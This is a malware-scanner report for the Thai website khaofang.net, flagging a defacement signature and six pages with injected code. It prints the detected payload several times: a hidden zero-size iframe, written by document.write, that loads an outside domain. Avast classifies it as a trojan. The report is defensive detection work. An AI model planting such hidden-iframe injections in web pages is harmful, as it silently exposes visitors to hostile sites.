New scan:

Malware Scanner report for khaofang.net

Malicious/Suspicious/Total urls checked
6/0/15
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/6/12
6 suspicious iframes found. See details below
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked By MEHR@N BBC   (10 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.khaofang.net/
200 OK
Content-Length: 29993
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)


<!--
document.write(unescape("<iframe frameborder="0" height="0" src="http:
width="0"></iframe>
<a href="http://www.devilscafe.in" target="_blank"><img

src="" />"));
//-->

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found. The same iFrame was found in 25 websites.
size: 0x0     
src: http://www.devilscafe.in

<iframe frameborder="0" height="0" src="http://www.devilscafe.in" width="0">

Deface/Content modification. The following signature was found: Hacked By MEHR@N BBC

...[26801 bytes skipped]...
;li><h2>ผู้มาเยี่ยม</h2>
<ul>
<script src="http://pub.mybloglog.com/comm3.php?mblID=2009052707470487&amp;r=widget&amp;is=small&amp;o=l&amp;ro=4&amp;cs=black&amp;ww=240&amp;wc=single&amp;l=n"></script>
<html><head><meta http-equiv="content-type" content="text/html; charset=windows-1252"><title>Hacked By MEHR@N BBC </title>



</head><body bgcolor="black"><p></p><style>BODY {PADDING-RIGHT: 5px;



PADDING-LEFT: 5px; SCROLLBAR-FACE-COLOR: #000000; BACKGROUND: #000000;



PADDING-BOTTOM: 5px; MARGIN: 0px; SCROLLBAR-HIGHLIGHT-COLOR: #000000;



SCROLLBAR-SHADOW-COLOR: #00c000; SCROLLBAR-3DLIGHT-COLOR: #00c000;



SCROLLBAR-ARROW-COLOR: #00c000; PAD
...[7578 bytes skipped]...


http://www.khaofang.net/wp-includes/js/l10n.js?ver=20101110
200 OK
Content-Length: 308
Content-Type: application/javascript
clean
http://www.khaofang.net/wp-includes/js/prototype.js?ver=1.6.1
200 OK
Content-Length: 139854
Content-Type: application/javascript
clean
http://www.khaofang.net/wp-includes/js/jquery/jquery.js?ver=1.4.4
200 OK
Content-Length: 78620
Content-Type: application/javascript
clean
http://www.khaofang.net/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1
200 OK
Content-Length: 927
Content-Type: application/javascript
clean
http://www.khaofang.net/index.php?ak_action=wp_grins_js
200 OK
Content-Length: 4582
Content-Type: text/javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 22456
Content-Type: text/javascript
clean
http://www.google.co.th/coop/cse/brand?form=cse-search-box&lang=th
200 OK
Content-Length: 2516
Content-Type: text/javascript
clean
http://pub.mybloglog.com/comm3.php?mblID=2009052707470487&r=widget&is=small&o=l&ro=4&cs=black&ww=240&wc=single&l=n
500 Can't connect to pub.mybloglog.com:80 (Bad hostname)
Content-Length: 166
Content-Type: text/plain
clean
http://pub.mybloglog.com/test404page.js
500 Can't connect to pub.mybloglog.com:80 (Bad hostname)
Content-Length: 166
Content-Type: text/plain
clean
http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/ga.js
404 Not Found
Content-Length: 16006
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


<!--
document.write(unescape("<iframe frameborder="0" height="0" src="http:
width="0"></iframe>
<a href="http://www.devilscafe.in" target="_blank"><img

src="" />"));
//-->

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found. The same iFrame was found in 25 websites.
size: 0x0     
src: http://www.devilscafe.in

<iframe frameborder="0" height="0" src="http://www.devilscafe.in" width="0">

http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js
404 Not Found
Content-Length: 16049
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


<!--
document.write(unescape("<iframe frameborder="0" height="0" src="http:
width="0"></iframe>
<a href="http://www.devilscafe.in" target="_blank"><img

src="" />"));
//-->

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found. The same iFrame was found in 25 websites.
size: 0x0     
src: http://www.devilscafe.in

<iframe frameborder="0" height="0" src="http://www.devilscafe.in" width="0">

http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js
404 Not Found
Content-Length: 16092
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


<!--
document.write(unescape("<iframe frameborder="0" height="0" src="http:
width="0"></iframe>
<a href="http://www.devilscafe.in" target="_blank"><img

src="" />"));
//-->

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found. The same iFrame was found in 25 websites.
size: 0x0     
src: http://www.devilscafe.in

<iframe frameborder="0" height="0" src="http://www.devilscafe.in" width="0">

http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js
404 Not Found
Content-Length: 16135
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


<!--
document.write(unescape("<iframe frameborder="0" height="0" src="http:
width="0"></iframe>
<a href="http://www.devilscafe.in" target="_blank"><img

src="" />"));
//-->

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found. The same iFrame was found in 25 websites.
size: 0x0     
src: http://www.devilscafe.in

<iframe frameborder="0" height="0" src="http://www.devilscafe.in" width="0">

http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js
404 Not Found
Content-Length: 16178
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


<!--
document.write(unescape("<iframe frameborder="0" height="0" src="http:
width="0"></iframe>
<a href="http://www.devilscafe.in" target="_blank"><img

src="" />"));
//-->

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found. The same iFrame was found in 25 websites.
size: 0x0     
src: http://www.devilscafe.in

<iframe frameborder="0" height="0" src="http://www.devilscafe.in" width="0">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: khaofang.net

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: khaofang.net
Referer: http://www.google.com/search?q=khaofang.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=khaofang.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://khaofang.net/

Result: khaofang.net is not infected or malware details are not published yet.